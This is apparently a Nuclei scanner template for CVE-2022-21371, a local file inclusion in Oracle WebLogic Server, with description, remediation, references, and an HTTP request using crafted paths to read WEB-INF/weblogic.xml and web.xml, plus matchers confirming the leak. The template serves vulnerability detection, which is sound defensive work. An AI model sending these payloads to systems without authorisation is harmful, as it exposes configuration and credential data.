63 lines
2.3 KiB
YAML
63 lines
2.3 KiB
YAML
id: CVE-2022-21371
|
|
|
|
info:
|
|
name: Oracle WebLogic Server Local File Inclusion
|
|
author: paradessia,narluin
|
|
severity: high
|
|
description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
|
|
impact: |
|
|
An attacker can read sensitive files containing credentials, configuration details, or other sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches provided by Oracle to fix the vulnerability.
|
|
reference:
|
|
- https://www.oracle.com/security-alerts/cpujan2022.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
|
|
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
|
|
- http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-21371
|
|
cwe-id: CWE-22
|
|
epss-score: 0.96287
|
|
epss-percentile: 0.99425
|
|
cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: oracle
|
|
product: weblogic_server
|
|
tags: cve,cve2022,lfi,weblogic,oracle,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
raw:
|
|
- |+
|
|
GET {{path}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
payloads:
|
|
path:
|
|
- .//WEB-INF/weblogic.xml
|
|
- .//WEB-INF/web.xml
|
|
|
|
stop-at-first-match: true
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
|
|
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
|
|
condition: or
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(header, "text/xml")'
|
|
- 'contains(header, "application/xml")'
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221009699bc52a8dbccde51d304747a8cf3484ac3311ee5af77ecdfef91f50ae0abe9022100cf0cfb57c9a03478fe4e6e38ea95cce07495293b806dc05331df7cf9685e6ca6:922c64590222798bb761d5b6d8e72950 |